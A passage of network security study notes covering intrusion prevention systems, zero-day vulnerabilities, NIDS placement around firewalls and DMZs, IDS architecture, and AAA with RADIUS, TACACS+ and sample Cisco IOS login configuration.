staff by automating responses to common attacks, enforces security
policies actively, complements firewalls with deeper inspection.
The types of IPS?
 Same as IDS
Architecture of an IPS?
 Similar components to IDS (sensors, analysis engine) but with an added
enforcement/blocking mechanism. Crucially, NIPS are deployed inline in
the network path.
Operating mode of an IPS?
 Operates actively ("in-band" or inline). It sits directly in the path of
network traffic (for NIPS) or monitors system calls directly (for HIPS) to
inspect and block threats before they reach their target.
How does an IPS work?
 It inspects traffic/activity in real-time. If malicious activity matching a
signature or anomalous behavior is detected, the IPS can take immediate
action, such as dropping packets, blocking connections, or terminating
malicious processes.
Examples of IPS solutions:
 Open Source: Snort (can run in IPS mode), Suricata (can run in IPS mode).
 Commercial: Many NGFWs have integrated IPS capabilities; standalone IPS
appliances are also available from various security vendors.

20.Network Security: IDS and Zero-Day Vulnerabilities

A zero-day vulnerability is a security flaw in software or hardware that has been
discovered (often by attackers) but is not yet known to the vendor or the public,
and for which no official patch or fix is available.
The term "zero-day" refers to the fact that the vendor has had "zero days" to
address the vulnerability before it can be actively exploited by cybercriminals.
While an IDS might not have a specific signature for a brand-new zero-day
exploit, it can still play a role thanks to:
 Anomaly Detection: Behavior-based or anomaly-based IDS may detect
suspicious activities or deviations from normal network/system behavior
that could be indicative of a zero-day exploit attempt or post-exploitation
activity.
 Heuristics: Some IDS use heuristics that might flag exploit-like patterns
even without a specific signature.

21.NIDS Placement: Upstream (Outside/Before) the Firewall

[Internet] ---> [NIDS] ---> [Firewall] ---> [Internal Network]
Characteristics of this Placement:
Visibility: The NIDS sees all traffic originating from the Internet before it is
filtered by the firewall.
 Pros: Can detect attacks that the firewall might block, providing a broader
view of attempted intrusions and attack trends. Useful for threat
intelligence gathering.
 Cons: The NIDS processes a larger volume of traffic, including malicious
traffic that the firewall would have dropped anyway. This can lead to more
alerts (potentially more false positives or "noise") and higher processing
load on the NIDS.
It helps identify what types of attacks are being launched against the network
perimeter.

22.NIDS Placement: Downstream (Inside/After) the Firewall

[Internet] ---> [Firewall] ---> [NIDS] ---> [Internal Network]
Characteristics of this Placement:
Visibility: The NIDS sees only the traffic that has been allowed through the
firewall.
  Pros: Reduces the volume of traffic the NIDS needs to analyze, as the
firewall has already filtered out a significant amount of
unwanted/malicious traffic.
Allows the NIDS to focus on detecting attacks that have bypassed the
firewall or threats originating from within the network (if the NIDS is
monitoring internal traffic segments).
Can lead to fewer alerts, potentially with a higher proportion of true
positives.
 Cons: The NIDS will not see attacks that were successfully blocked by the
firewall, potentially missing some threat intelligence.
This placement helps identify threats that have managed to get past the initial
perimeter defense.

23.NIDS Placement: Monitoring Multiple Segments (e.g., DMZ, Internal LAN)

In more complex network architectures, NIDS sensors can be deployed to
monitor traffic at various strategic points:
A central firewall creates distinct zones: Internet (unsecure), DMZ (semi-trusted),
and Internal LAN (secure).
NIDS sensors are placed to monitor:
 Traffic between the Internet and the Firewall (Perimeter): Sees all external
traffic attempts.
 Traffic within the DMZ or to/from DMZ servers: Monitors activity related to
publicly accessible services (e.g., web servers, email servers) located in
the DMZ. This is crucial as DMZ servers are common targets.
 Traffic within the Internal LAN or between the LAN and other zones:
Monitors for internal threats, compromised internal hosts, or attacks that
have bypassed perimeter defenses.
Benefits of Multi-Sensor Deployment:
 Provides granular visibility into traffic flows across different network
segments.
 Helps detect threats specific to each zone (e.g., attacks against public
servers in the DMZ, lateral movement within the internal network).
 Offers a more comprehensive intrusion detection capability as part of a
defense-in-depth strategy.
 A "Centralized Administration" console often collects and correlates alerts
from all distributed NIDS sensors.
 24.Logical Architecture of an Intrusion Detection System (IDS)
An IDS, whether network-based (NIDS) or host-based (HIDS), generally consists
of three main logical components:
Sensors (Data Collection / Capture):
 Responsible for collecting the raw data that will be analyzed for signs of
intrusion.
 NIDS: Sensors are network interfaces that capture network packets (often
using libraries like `libpcap` and filters like BPF to select relevant traffic).
 HIDS: Sensors are agents or processes on the host that collect data such
as system logs, application logs, file system changes, system calls, and
local network activity.
 Note: NIDS sensors can sometimes miss packets if network traffic volume
is excessively high (overload).
Analysis Engine:
 The core component that processes the data collected by the sensors and
attempts to identify malicious activity or policy violations.
Detection Methods:
 Signature-Based Detection (Misuse Detection): Compares collected data
against a database of known attack patterns (signatures). Effective for
known threats but cannot detect novel attacks.
 Anomaly-Based Detection (Behavioral Detection): Establishes a baseline of
normal network or system behavior. It then monitors for deviations from
this baseline, which could indicate an attack. This can detect
new/unknown attacks but may also generate more false positives.
 Techniques include statistical analysis, heuristics, and increasingly,
machine learning for modern IDS.
Management Console (Alerting & Reporting):
 When the analysis engine flags a potential security event:
 Generates Alerts: Notifies administrators or security personnel about the
detected incident (e.g., via email, SMS, system messages, dashboard
notifications).
 Logging: Records details of the event for later analysis and auditing.
 Reporting: Often provides tools for generating reports on detected
activities and system status.
 25.AAA (Authentication, Authorization, and Accounting)
AAA is a security framework used to control access to network resources, enforce
policies, and audit usage. It consists of three core components:
Authentication:
 What it is: The process of verifying the identity of a user, device, or
process attempting to access a system or network resource. "Are you who
you say you are?"
 How it works: Typically involves challenging the entity for credentials (e.g.,
username/password, digital certificate, token) and validating them against
a database.
 Outcome: Grants or denies initial access based on successful identity
verification.
Authorization:
 What it is: The process of determining what an authenticated entity is
permitted to do or access after they have been successfully authenticated.
"Now that I know who you are, what are you allowed to do?"
 How it works: Applies specific permissions, privileges, or restrictions based
on the authenticated identity's role, group membership, or other
attributes.
 Examples: Allowing a user to execute certain commands on a router,
access specific files, or use particular network services, while restricting
other actions.
Accounting (Traceability):
 What it is: The process of collecting and logging information about the
activities of authenticated entities and the resources they consume. "What
did you do?"
 How it works: Records details such as login/logout times, commands
executed, data transferred, services accessed, etc.
 Purpose: Used for auditing, billing, security monitoring, incident response,
and resource management.
AAA Implementation Methods on Network Devices (e.g., Cisco Routers):
Password Only (for device access, e.g., VTY lines):
 A single, simple password configured on lines (e.g., console, VTY for
Telnet/SSH).
 Example: `line vty 0 4` then `password cisco` then `login`
 Security: Very basic, not recommended for strong security.
Local Database (for device access):
 Usernames and passwords (often encrypted) are stored directly on the
network device itself.
 Example: `username [name] secret [password]`, `line vty 0 4` then
`login local`
 Pros: Simple to set up for a few devices.
 Cons: Not scalable; requires managing user accounts individually on every
device. If you have many devices, replicating and synchronizing these
local databases is difficult and tedious.
AAA Server (Centralized AAA):
The most robust and scalable method.
User credentials, authorization policies, and accounting logs are managed on a
central AAA server (e.g., Cisco ACS, RADIUS server, TACACS+ server).
Network devices (routers, switches, firewalls, APs) act as AAA clients, forwarding
authentication requests to the AAA server.
Pros:
 Centralized user and policy management.
 Scalability for large networks.
 Consistent security policies across devices.
 Detailed, centralized accounting logs.
Activation (Cisco IOS Example):
 `aaa new-model` (Enables the AAA framework globally)
 `username [name] secret [password]` (Can still be used as a local
fallback)
 `aaa authentication login default [method_list1] [method_list2] ...`
(Defines authentication methods.
`local` uses the router's local database. Other methods point to AAA
servers).
 `aaa authentication attempt max fail [number]` (limits login attempts).
Configuration to define AAA server(s) (e.g., RADIUS or TACACS+ server IP, shared
secret).
Protocols for Communication with AAA Servers:
Network devices (AAA clients) communicate with AAA servers using specific
protocols:
RADIUS (Remote Authentication Dial-In User Service):
 A widely used client-server protocol for centralized Authentication,
Authorization, and Accounting.
 Invented by Livingston Enterprise in 1991, now an IETF standard.
 Transport Protocol: Operates over UDP
 Standard ports: UDP 1812 (Authentication/Authorization), UDP 1813
(Accounting).
 Legacy ports: UDP 1645 (Authentication/Authorization), UDP 1646
(Accounting).
Characteristics:
 Combines Authentication and Authorization in the same packet exchange.
 Encrypts only the password in the access-request packet (not the entire
packet).
 Extensible through vendor-specific attributes (VSAs).
TACACS+ (Terminal Access Controller Access-Control System Plus):
  A Cisco-proprietary protocol (though an open IETF draft exists) that also
provides AAA services. Evolved from earlier TACACS and XTACACS.
 Operates over TCP 49
Characteristics:
 Separates AAA functions: Authentication, Authorization, and Accounting
are distinct processes and message types. This provides more flexibility.
 Encrypts the entire packet payload (not just the password), offering better
confidentiality for the entire AAA exchange.
 Provides more granular control over command authorization (can
authorize individual commands a user executes on a device).
 Often preferred for device administrative control due to its separation of
AAA functions and full packet encryption.
Choosing Between RADIUS and TACACS+:
RADIUS: Widely supported by many vendors, good for network access control
(e.g., 802.1X for Wi-Fi or wired ports).
TACACS+: Offers more granular command authorization and full packet
encryption, making it a strong choice for managing administrative access to
network devices (routers, switches, firewalls).

Authentication Method Lists:

 Define sequences of authentication methods to try.
 Default List: Applied to lines (e.g., VTY) if no specific list is named.

Methods to chose in `aaa authentication login default [method1]

[method2] ...`:
 `local` (local DB)
 `group [radius_group_name | tacacs_server_name]`
 `enable` (enable password)
 `none` (no authentication)

Named List: Custom list applied to specific lines.

 `aaa authentication login [list_name] [method1] [method2] ...`

Applied to a line:
 `line vty 0 4`
 `login authentication [list_name]` or `login authentication default`.

Example Local AAA Configuration:

 R1(config)# aaa new-model
R1(config)# username admin privilege 15 secret MyStrongP@ss
R1(config)# username user1 secret UserP@ss
R1(config)# aaa authentication login default local enable
R1(config)# line vty 0 4
R1(config-line)# login authentication default
R1(config)# aaa authentication attempts login max-fail 3